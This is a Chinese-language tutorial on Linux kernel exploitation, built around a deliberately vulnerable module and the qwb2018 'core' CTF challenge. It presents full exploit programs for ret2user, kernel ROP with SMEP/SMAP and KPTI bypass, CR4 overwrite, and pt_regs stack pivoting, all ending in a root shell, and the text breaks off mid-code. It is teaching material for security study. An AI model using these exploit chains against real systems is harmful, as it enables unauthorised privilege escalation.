NULL Pointer Dereference

上古利用方法，仅做记录。

如果内核模块中存在可以被调用的空函数指针，那么调用该空函数指针时会执行 0 地址处的代码。如果事先在内存 0 地址处写入 payload ，就会执行该 payload 。

首先内核驱动代码如下，其中 my_funptr 是一个空函数指针，且在调用 write 函数时会执行到。

#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>

MODULE_LICENSE("Dual BSD/GPL");

void (*my_funptr)(void);

ssize_t bug1_write(struct file *file, const char *buf, size_t len, loff_t *loff) {
    printk("[+] bug1_write\n");
    my_funptr();
    return 1;
}

static struct proc_ops proc_fops = {
        .proc_write = bug1_write,
};

/*
 * Module entry point: registers /proc/bug1 backed by proc_fops.
 *
 * Returns 0 on success, or -ENOMEM when the proc entry cannot be created so
 * that a half-initialised module is never left loaded.
 */
static int __init null_dereference_init(void) {
    /* proc_create() returns a pointer; storing it in an int truncates it. */
    struct proc_dir_entry *proc;

    printk("[+] null_dereference driver init\n");
    proc = proc_create("bug1", 0666, NULL, &proc_fops);
    if (!proc) {
        printk("[-] Failed to create proc\n");
        return -ENOMEM;
    }
    return 0;
}

/*
 * Module exit point: removes /proc/bug1 so that no proc entry keeps pointing
 * at proc_fops after the module text has been unloaded.
 */
static void __exit null_dereference_exit(void) {
    remove_proc_entry("bug1", NULL);
    printk("[-] null_dereference driver exit\n");
}

module_init(null_dereference_init);
module_exit(null_dereference_exit);

exp 如下，首先在 0 地址处写入提权 payload，然后调用 write 函数执行 payload，最后返回到用户空间执行 system("/bin/sh") 获取 shell 。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

char payload[] = "\x48\x31\xc0\xe8\xe8\x7b\x0d\x81\xe8\x93\x76\x0d\x81\xc3";

/*
 * Demo driver for the bug1 module: maps the page at address 0, copies the
 * payload there, then issues a write() on /proc/bug1 so the module calls its
 * NULL function pointer. Finally spawns a shell.
 *
 * Returns 0 on success, 1 when the mapping or the proc file is unavailable.
 */
int main() {
    /* The mapping can be refused (e.g. when low addresses may not be mapped);
     * without this check the memcpy below would simply fault. */
    void *page = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(page, payload, sizeof(payload));

    int fd = open("/proc/bug1", O_WRONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    /* Length matches the 3 characters actually provided (the original passed 7). */
    write(fd, "123", 3);
    system("/bin/sh");
    return 0;
}

执行 exp ，利用 gdb 调试发现执行到 payload 。

不过现在的内核很难直接利用这一漏洞。

Kernel Stack Buffer Overflow

这里以 qwb2018 core 为例进行讲解。

core_fops 结构体中定义了 core_write ，core_ioctl ，core_release 三个回调函数。

core_write 向 name 写入 0x800 长度的数据。

/*
 * Decompiled write handler: copies up to 0x800 bytes from the user buffer a2
 * into the global `name`.
 *
 * a1 - unused here
 * a2 - user-space source address
 * a3 - number of bytes requested
 *
 * Returns a3 (truncated to 32 bits) on success, otherwise 4294967282.
 */
__int64 __fastcall core_write(__int64 a1, __int64 a2, unsigned __int64 a3)
{
  printk("\x016core: called core_writen");
  /* Only the length is bounded (<= 0x800); the bytes themselves are stored verbatim in `name`. */
  if ( a3 <= 0x800 && !copy_from_user(&name, a2, a3) )
    return (unsigned int)a3;
  printk("\x016core: error copying data from userspacen", a2);
  /* 4294967282 == 0xFFFFFFF2, i.e. -14 as a 32-bit value (presumably -EFAULT; confirm). */
  return 4294967282LL;
}

core_ioctl 有三个功能，其中 0x6677889C 可以设置 off 。

/*
 * Decompiled ioctl dispatcher.
 *
 * a1 - unused here
 * a2 - command code
 * a3 - command argument (user pointer, offset or length depending on a2)
 *
 * Always returns 0; unknown commands are silently ignored.
 */
__int64 __fastcall core_ioctl(__int64 a1, int a2, const void *a3)
{
  switch ( a2 )
  {
    case 0x6677889B:
      /* Hand the user pointer to core_read. */
      core_read(a3);
      break;
    case 0x6677889C:
      printk("\x016core: %d\n", a3);
      /* The caller-supplied value is stored in the global `off` without any range check. */
      off = (__int64)a3;
      break;
    case 0x6677889A:
      printk("\x016core: called core_copy\n");
      /* a3 is reinterpreted as a signed 64-bit length. */
      core_copy_func((__int64)a3);
      break;
  }
  return 0LL;
}

core_read 可以越界读 canary 。

unsigned __int64 __fastcall core_read(const void *a1)
{
  ...
  char v5[64]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int64 canary; // [rsp+40h] [rbp-10h]

  canary = __readgsqword(0x28u);
  ...
  result = copy_to_user(a1, &v5[off], 64LL);
  ...
}

core_copy_func 存在栈溢出。

/*
 * Decompiled helper: copies `len` bytes from the global `name` into the
 * 64-byte stack buffer v2.
 *
 * len - signed 64-bit length supplied by the ioctl caller
 *
 * Returns 0 after copying, or 0xFFFFFFFF when len > 63.
 */
__int64 __fastcall core_copy_func(__int64 len)
{
  __int64 result; // rax
  char v2[64]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int64 canary; // [rsp+40h] [rbp-10h]

  canary = __readgsqword(0x28u);
  printk("\x016core: called core_writen");
  /* The comparison is signed, so every negative len passes this check. */
  if ( len > 63 )
  {
    printk("\x016Detect Overflow");
    return 0xFFFFFFFFLL;
  }
  else
  {
    result = 0LL;
    /* Only the low 16 bits of len are used as the copy size: a negative len
     * such as 0xffffffffffff0100 copies 0x100 bytes into the 64-byte v2,
     * running past the canary slot that follows it. */
    qmemcpy(v2, &name, (unsigned __int16)len);
  }
  return result;
}

ret2user

即返回到用户空间的提权代码上进行提权，之后返回用户态即为 root 权限。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define KERNCALL __attribute__((regparm(3)))

void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xFFFFFFFF8109CCE0;

void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF8109C8E0;

void *init_cred = (void *) 0xFFFFFFFF8223D1A0;

void get_shell() { system("/bin/sh"); }


struct trap_frame {
    size_t user_rip;
    size_t user_cs;
    size_t user_rflags;
    size_t user_sp;
    size_t user_ss;
} __attribute__((packed));
struct trap_frame tf;
size_t user_cs, user_rflags, user_sp, user_ss, tf_addr = (size_t) &tf;

/*
 * Records the current cs, ss, rsp and rflags in the user_* globals and fills
 * the global trap frame `tf` from them, with get_shell as the saved rip.
 */
void save_status() {
    /* Operands are written destination-first (Intel order) — presumably the
     * file is built with -masm=intel; confirm against the build command. */
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    tf.user_rip = (size_t) get_shell;
    tf.user_cs = user_cs;
    tf.user_rflags = user_rflags;
    /* The saved stack pointer is lowered by 0x1000 relative to the rsp captured above. */
    tf.user_sp = user_sp - 0x1000;
    tf.user_ss = user_ss;
    puts("[*] status has been saved.");
}

/*
 * Calls commit_creds(prepare_kernel_cred(0)) through the global function
 * pointers, then executes swapgs, loads rsp from tf_addr (the address of the
 * global trap frame `tf`) and executes iretq.
 */
void get_root() {
    // Alternative: commit_creds(init_cred);
    commit_creds(prepare_kernel_cred(0));
    /* rsp is pointed at `tf` so that iretq pops rip/cs/rflags/rsp/ss from it. */
    asm("swapgs;"
        "mov rsp, tf_addr;"
        "iretq;");
}

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_copy_func(size_t len) {
    ioctl(core_fd, 0x6677889A, len);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

/*
 * Reads /tmp/kallsyms, finds the first commit_creds or prepare_kernel_cred
 * entry, and shifts every hard-coded kernel address by the difference between
 * the listed address and the hard-coded one.
 *
 * Exits with status -1 when the file cannot be opened. When neither symbol is
 * listed, the hard-coded addresses are left unchanged.
 */
void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    /* fopen() signals failure with NULL, never with a negative value. */
    if (kallsyms_fd == NULL) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char line[0x100], name[0x50], type[0x10];
    size_t addr;
    /* Parse line by line: the loop ends at EOF (a bare fscanf() condition is
     * true for EOF) and malformed lines are skipped. Field widths keep %s
     * inside the buffers; %zx matches size_t. */
    while (fgets(line, sizeof(line), kallsyms_fd) != NULL) {
        if (sscanf(line, "%zx %15s %79s", &addr, type, name) != 3) {
            continue;
        }
        size_t offset;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - (size_t) commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - (size_t) prepare_kernel_cred;
        } else {
            continue;
        }
        printf("[*] offset: 0x%zx\n", offset);
        commit_creds = (void *) ((size_t) commit_creds + offset);
        prepare_kernel_cred = (void *) ((size_t) prepare_kernel_cred + offset);
        init_cred = (void *) ((size_t) init_cred + offset);
        break;
    }
    fclose(kallsyms_fd);
    printf("[*] commit_creds: 0x%zx\n", (size_t) commit_creds);
    printf("[*] prepare_kernel_cred: 0x%zx\n", (size_t) prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    rebase();
    save_status();
    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }
    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);
    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;
    *(void **) &buf[80] = get_root;
    core_write(buf, sizeof(buf));
    core_copy_func(0xffffffffffff0000 | sizeof(buf));
    return 0;
}

kernel rop

开启 smep 和 smap 保护后，内核空间无法执行用户空间的代码，并且无法访问用户空间的数据。因此不能直接 ret2user 。
利用 ROP ，执行 commit_creds(prepare_kernel_cred(0)) , 然后 iret 返回用户空间可以绕过上述保护。

这里我添加了 smep 和 smap 保护。

#!/bin/sh

qemu-system-x86_64 \
  -m 256M \
  -kernel ./bzImage \
  -initrd ./core.cpio \
  -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \
  -s \
  -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
  -nographic \
  -cpu qemu64,+smep,+smap

并且不开启 KPTI 保护。

/ # cat /sys/devices/system/cpu/vulnerabilities/*
Not affected
Mitigation: __user pointer sanitization
Vulnerable: Minimal generic ASM retpoline

由于找不到 mov rdi, rax; ret; 这条 gadget ，因此需要用 mov rdi, rax; call rdx; 代替，其中 rdx 指向 pop rcx; ret; 可以清除 call 指令压入栈中的 rip ，因此相当于 ret 。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/ioctl.h>

size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0;
size_t commit_creds = 0xFFFFFFFF8109C8E0;
size_t init_cred = 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t pop_rdx_ret = 0xffffffff810a0f49;
size_t pop_rcx_ret = 0xffffffff81021e53;
size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a;
size_t swapgs_popfq_ret = 0xffffffff81a012da;
size_t iretq = 0xffffffff81050ac2;

void get_shell() {
    system("/bin/sh");
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_copy_func(size_t len) {
    ioctl(core_fd, 0x6677889A, len);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

/*
 * Reads /tmp/kallsyms, finds the first commit_creds or prepare_kernel_cred
 * entry, and shifts every hard-coded kernel address by the difference between
 * the listed address and the hard-coded one.
 *
 * Exits with status -1 when the file cannot be opened. When neither symbol is
 * listed, the hard-coded addresses are left unchanged.
 */
void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    /* fopen() signals failure with NULL, never with a negative value. */
    if (kallsyms_fd == NULL) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char line[0x100], name[0x50], type[0x10];
    size_t addr;
    /* Parse line by line: the loop ends at EOF (a bare fscanf() condition is
     * true for EOF) and malformed lines are skipped. */
    while (fgets(line, sizeof(line), kallsyms_fd) != NULL) {
        if (sscanf(line, "%zx %15s %79s", &addr, type, name) != 3) {
            continue;
        }
        size_t offset;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - prepare_kernel_cred;
        } else {
            continue;
        }
        printf("[*] offset: 0x%zx\n", offset);
        commit_creds += offset;
        prepare_kernel_cred += offset;
        init_cred += offset;
        pop_rdi_ret += offset;
        pop_rdx_ret += offset;
        pop_rcx_ret += offset;
        mov_rdi_rax_call_rdx += offset;
        swapgs_popfq_ret += offset;
        iretq += offset;
        break;
    }
    fclose(kallsyms_fd);
    printf("[*] commit_creds: 0x%zx\n", commit_creds);
    printf("[*] prepare_kernel_cred: 0x%zx\n", prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    save_status();
    rebase();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;

    size_t *rop = (size_t *) &buf[80], it = 0;


    rop[it++] = pop_rdi_ret;
    rop[it++] = init_cred;
    rop[it++] = commit_creds;

//    rop[it++] = pop_rdi_ret;
//    rop[it++] = 0;
//    rop[it++] = prepare_kernel_cred;
//    rop[it++] = pop_rdx_ret;
//    rop[it++] = pop_rcx_ret;
//    rop[it++] = mov_rdi_rax_call_rdx;
//    rop[it++] = commit_creds;

    rop[it++] = swapgs_popfq_ret;
    rop[it++] = 0;
    rop[it++] = iretq;
    rop[it++] = (size_t) get_shell;
    rop[it++] = user_cs;
    rop[it++] = user_rflags;
    rop[it++] = user_sp;
    rop[it++] = user_ss;

    core_write(buf, sizeof(buf));

    core_copy_func(0xffffffffffff0000 | sizeof(buf));

    return 0;
}

将 CPU 类型修改为 kvm64 后开启了 KPTI 保护。

#!/bin/sh

qemu-system-x86_64 \
  -m 256M \
  -kernel ./bzImage \
  -initrd ./core.cpio \
  -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \
  -s \
  -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
  -nographic \
  -cpu kvm64,+smep,+smap
#  -cpu qemu64,+smep,+smap

/ # cat /sys/devices/system/cpu/vulnerabilities/*
Mitigation: PTI
Mitigation: __user pointer sanitization
Vulnerable: Minimal generic ASM retpoline

此时需要借助 swapgs_restore_regs_and_return_to_usermode 返回用户态。

该函数是内核在 arch/x86/entry/entry_64.S 中提供的一个用于完成内核态到用户态切换的函数。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/ioctl.h>

size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0;
size_t commit_creds = 0xFFFFFFFF8109C8E0;
size_t init_cred = 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t pop_rdx_ret = 0xffffffff810a0f49;
size_t pop_rcx_ret = 0xffffffff81021e53;
size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a;
size_t swapgs_popfq_ret = 0xffffffff81a012da;
size_t iretq = 0xffffffff81050ac2;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA;

void get_shell() {
    system("/bin/sh");
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_copy_func(size_t len) {
    ioctl(core_fd, 0x6677889A, len);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

/*
 * Reads /tmp/kallsyms, finds the first commit_creds or prepare_kernel_cred
 * entry, and shifts every hard-coded kernel address by the difference between
 * the listed address and the hard-coded one.
 *
 * Exits with status -1 when the file cannot be opened. When neither symbol is
 * listed, the hard-coded addresses are left unchanged.
 */
void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    /* fopen() signals failure with NULL, never with a negative value. */
    if (kallsyms_fd == NULL) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char line[0x100], name[0x50], type[0x10];
    size_t addr;
    /* Parse line by line: the loop ends at EOF (a bare fscanf() condition is
     * true for EOF) and malformed lines are skipped. */
    while (fgets(line, sizeof(line), kallsyms_fd) != NULL) {
        if (sscanf(line, "%zx %15s %79s", &addr, type, name) != 3) {
            continue;
        }
        size_t offset;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - prepare_kernel_cred;
        } else {
            continue;
        }
        printf("[*] offset: 0x%zx\n", offset);
        commit_creds += offset;
        prepare_kernel_cred += offset;
        init_cred += offset;
        pop_rdi_ret += offset;
        pop_rdx_ret += offset;
        pop_rcx_ret += offset;
        mov_rdi_rax_call_rdx += offset;
        swapgs_popfq_ret += offset;
        iretq += offset;
        swapgs_restore_regs_and_return_to_usermode += offset;
        break;
    }
    fclose(kallsyms_fd);
    printf("[*] commit_creds: 0x%zx\n", commit_creds);
    printf("[*] prepare_kernel_cred: 0x%zx\n", prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    save_status();
    rebase();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;

    size_t *rop = (size_t *) &buf[80], it = 0;


    rop[it++] = pop_rdi_ret;
    rop[it++] = init_cred;
    rop[it++] = commit_creds;

//    rop[it++] = pop_rdi_ret;
//    rop[it++] = 0;
//    rop[it++] = prepare_kernel_cred;
//    rop[it++] = pop_rdx_ret;
//    rop[it++] = pop_rcx_ret;
//    rop[it++] = mov_rdi_rax_call_rdx;
//    rop[it++] = commit_creds;

    rop[it++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop[it++] = 0;
    rop[it++] = 0;
    rop[it++] = (size_t) get_shell;
    rop[it++] = user_cs;
    rop[it++] = user_rflags;
    rop[it++] = user_sp;
    rop[it++] = user_ss;

    core_write(buf, sizeof(buf));

    core_copy_func(0xffffffffffff0000 | sizeof(buf));

    return 0;
}

如果找不到 swapgs_restore_regs_and_return_to_usermode 则可以为 SIGSEGV 注册异常处理函数 get_shell ，然后按照没有 kpti 的方式返回用户态。触发异常后自动完成用户态的返回。

signal(SIGSEGV, get_shell);

kernel rop + ret2user

这种方法实际上是将前两种方法结合起来，同样可以绕过 smap 和 smep 保护。大体思路是先利用 rop 设置 cr4 为 0x6f0 （这个值可以通过用 cr4 原始值 & 0xFFFFF 得到）关闭 smep ，然后 iret 到用户空间去执行提权代码。

注意这里 smap 保护不能直接关闭，因此不能像前面 ret2user 那样直接在 exp 中写入 trap frame 然后栈迁移到 trap frame 的地址，而是在 rop 中构造 trap frame 结构。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define KERNCALL __attribute__((regparm(3)))

void *(*prepare_kernel_cred)(void *) KERNCALL = (void *) 0xFFFFFFFF8109CCE0;

void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF8109C8E0;

void *init_cred = (void *) 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t pop_rdx_ret = 0xffffffff810a0f49;
size_t pop_rcx_ret = 0xffffffff81021e53;
size_t mov_cr4_rdi_ret = 0xffffffff81075014;
size_t mov_rdi_rax_call_rdx = 0xffffffff8101aa6a;
size_t swapgs_popfq_ret = 0xffffffff81a012da;
size_t iretq = 0xffffffff81050ac2;

void get_shell() { system("/bin/sh"); }

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

void get_root() {
//    commit_creds(init_cred);
    commit_creds(prepare_kernel_cred(0));
}

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_copy_func(size_t len) {
    ioctl(core_fd, 0x6677889A, len);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    if (kallsyms_fd < 0) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char name[0x50], type[0x10];
    size_t addr;
    while (fscanf(kallsyms_fd, "%llx%s%s", &addr, type, name)) {
        size_t offset = -1;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - (size_t) commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - (size_t) prepare_kernel_cred;
        }
        if (offset != -1) {
            printf("[*] offset: %p\n", offset);
            commit_creds = (void *) ((size_t) commit_creds + offset);
            prepare_kernel_cred = (void *) ((size_t) prepare_kernel_cred + offset);
            init_cred = (void *) ((size_t) init_cred + offset);
            pop_rdi_ret += offset;
            pop_rdx_ret += offset;
            pop_rcx_ret += offset;
            mov_rdi_rax_call_rdx += offset;
            swapgs_popfq_ret += offset;
            iretq += offset;
            break;
        }
    }
    printf("[*] commit_creds: %p\n", (size_t) commit_creds);
    printf("[*] prepare_kernel_cred: %p\n", (size_t) prepare_kernel_cred);
}

size_t get_canary() {
    set_off(64);
    char buf[64];
    coore_read(buf);
    return *(size_t *) buf;
}

int main() {
    save_status();
    rebase();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;

    size_t *rop = (size_t *) &buf[80], it = 0;


    rop[it++] = pop_rdi_ret;
    rop[it++] = 0x00000000000006f0;
    rop[it++] = mov_cr4_rdi_ret;
    rop[it++] = (size_t) get_root;
    rop[it++] = swapgs_popfq_ret;
    rop[it++] = 0;
    rop[it++] = iretq;
    rop[it++] = (size_t) get_shell;
    rop[it++] = user_cs;
    rop[it++] = user_rflags;
    rop[it++] = user_sp;
    rop[it++] = user_ss;

    core_write(buf, sizeof(buf));

    core_copy_func(0xffffffffffff0000 | sizeof(buf));

    return 0;
}

利用 pt_regs 构造 kernel ROP

这次我们限制溢出只能覆盖返回地址，此时需要栈迁移到其他地方构造 rop 。其中一个思路就是在 pt_regs 上构造 rop 。

我们在调用 core_copy_func 函数之前先将寄存器设置为几个特殊的值，然后在 core_copy_func 函数的返回处下断点。

__asm__(
        "mov r15, 0x1111111111111111;"
        "mov r14, 0x2222222222222222;"
        "mov r13, 0x3333333333333333;"
        "mov r12, 0x4444444444444444;"
        "mov rbp, 0x5555555555555555;"
        "mov rbx, 0x6666666666666666;"
        "mov r11, 0x7777777777777777;"
        "mov r10, 0x8888888888888888;"
        "mov r9, 0x9999999999999999;"
        "mov r8, 0xaaaaaaaaaaaaaaaa;"
        "mov rcx, 0xbbbbbbbbbbbbbbbb;"
        "mov rax, 16;"
        "mov rdx, 0xffffffffffff0050;"
        "mov rsi, 0x6677889A;"
        "mov rdi, core_fd;"
        "syscall"
        );

此时可以看到 pt_regs 相对于栈顶的偏移为 0xF0 ，除去这里的 ret 需要将 rsp 加上 0xE8 才能将栈迁移到 pt_regs 的起始地址。

另外值得注意的是 pt_regs 中对应 r11 和 rcx 的位置分别被写入了 eflags 和返回地址，因此不受我们控制。

设置条件断点查证一下，发现在程序入口点的位置这两个寄存器就已经被修改了。

借助 IDAPython 脚本在 vmlinux 中查找合适的 gadget 。

import idc
from idaapi import *
import idautils

start_ea = None
end_ea = None
max_len = 10  # upper bound on the number of instructions recorded per gadget


class Gadget():
    """One `add rsp, X ... retn` sequence found in .text.

    addr -- address of the leading `add rsp` instruction
    asms -- disassembly text of every instruction in the sequence
    val  -- the `add rsp` immediate, adjusted by +8 per `pop` and -8 per `push`
    """

    def __init__(self, addr, asms, val):
        self.addr = addr
        self.asms = asms
        self.val = val


if __name__ == '__main__':
    # Locate the bounds of the .text segment.
    for seg in idautils.Segments():
        if idc.get_segm_name(seg) == '.text':
            start_ea = idc.get_segm_start(seg)
            end_ea = idc.get_segm_end(seg)
            break
    assert start_ea is not None, "no .text segment found"

    gadgets = []
    i = start_ea
    while i < end_ea:
        asm = idc.generate_disasm_line(i, 0).split(";")[0]
        if not asm.startswith("add     rsp, "):
            i += get_item_size(i)
            continue

        # Walk forward from the `add rsp` until a `retn`, a disqualifying
        # instruction, or the length limit is reached.
        asms = [asm.replace("     ", " ")]
        val = idc.get_operand_value(i, 1)
        j = i + get_item_size(i)
        while j < end_ea:
            asm = idc.generate_disasm_line(j, 0).split(";")[0]
            asms.append(asm.replace("     ", " "))
            if len(asms) > max_len:
                break
            # Anything else that touches the stack pointer or transfers
            # control makes the net stack adjustment unpredictable.
            if "rsp" in asm or "esp" in asm or "leave" in asm or "call" in asm:
                break
            mnem = print_insn_mnem(j)
            if mnem == "push":
                val -= 8
            elif mnem == "pop":
                val += 8
            elif mnem == "retn":
                gadget = Gadget(i, asms, val)
                gadgets.append(gadget)
                print("val: " + hex(gadget.val))
                print(hex(gadget.addr) + " : " + "; ".join(gadget.asms) + ";")
                j += get_item_size(j)
                break
            j += get_item_size(j)
        # Resume at the instruction that ended the walk so that it is
        # examined as a possible gadget start itself.
        i = j

    gadgets.sort(key=lambda gadget: gadget.val)
    print("_________________________________________")
    print(len(gadgets))
    # `with` guarantees the report file is closed even if a write fails.
    with open("rop.txt", "w") as fp:
        for gadget in gadgets:
            fp.write("val: " + hex(gadget.val) + "\n")
            fp.write(hex(gadget.addr) + " : " + "; ".join(gadget.asms) + ";\n")

随便选择一个可以把 rsp 加 0xE8 的 gadget 。

swapgs_restore_regs_and_return_to_usermode 函数前面的操作是依次弹出 pt_regs 结构体中的元素，而前面 4 个寄存器已经用来写 ROP 了，因此要从 swapgs_restore_regs_and_return_to_usermode + 8 开始。

由于这里用的是正常的 trap_frame 因此不需要 save_status 和伪造 trap_frame 。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>

size_t prepare_kernel_cred = 0xFFFFFFFF8109CCE0;
size_t commit_creds = 0xFFFFFFFF8109C8E0;
size_t init_cred = 0xFFFFFFFF8223D1A0;
size_t pop_rdi_ret = 0xffffffff81000b2f;
size_t add_rsp_0xe8_ret = 0xffffffff816bb966;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81A008DA;

int core_fd;

void coore_read(char *buf) {
    ioctl(core_fd, 0x6677889B, buf);
}

void set_off(size_t off) {
    ioctl(core_fd, 0x6677889C, off);
}

void core_write(char *buf, size_t len) {
    write(core_fd, buf, len);
}

/*
 * Reads /tmp/kallsyms, finds the first commit_creds or prepare_kernel_cred
 * entry, and shifts every hard-coded kernel address by the difference between
 * the listed address and the hard-coded one.
 *
 * Exits with status -1 when the file cannot be opened. When neither symbol is
 * listed, the hard-coded addresses are left unchanged.
 */
void rebase() {
    FILE *kallsyms_fd = fopen("/tmp/kallsyms", "r");
    /* fopen() signals failure with NULL, never with a negative value. */
    if (kallsyms_fd == NULL) {
        puts("[-] Failed to open kallsyms.\n");
        exit(-1);
    }
    char line[0x100], name[0x50], type[0x10];
    size_t addr;
    /* Parse line by line: the loop ends at EOF (a bare fscanf() condition is
     * true for EOF) and malformed lines are skipped. */
    while (fgets(line, sizeof(line), kallsyms_fd) != NULL) {
        if (sscanf(line, "%zx %15s %79s", &addr, type, name) != 3) {
            continue;
        }
        size_t offset;
        if (!strcmp(name, "commit_creds")) {
            offset = addr - commit_creds;
        } else if (!strcmp(name, "prepare_kernel_cred")) {
            offset = addr - prepare_kernel_cred;
        } else {
            continue;
        }
        printf("[*] offset: 0x%zx\n", offset);
        commit_creds += offset;
        prepare_kernel_cred += offset;
        init_cred += offset;
        pop_rdi_ret += offset;
        add_rsp_0xe8_ret += offset;
        /* The extra 8 is applied only here, i.e. only when a symbol was found. */
        swapgs_restore_regs_and_return_to_usermode += offset + 8;
        break;
    }
    fclose(kallsyms_fd);
    printf("[*] commit_creds: 0x%zx\n", commit_creds);
    printf("[*] prepare_kernel_cred: 0x%zx\n", prepare_kernel_cred);
}

size_t get_canary() {
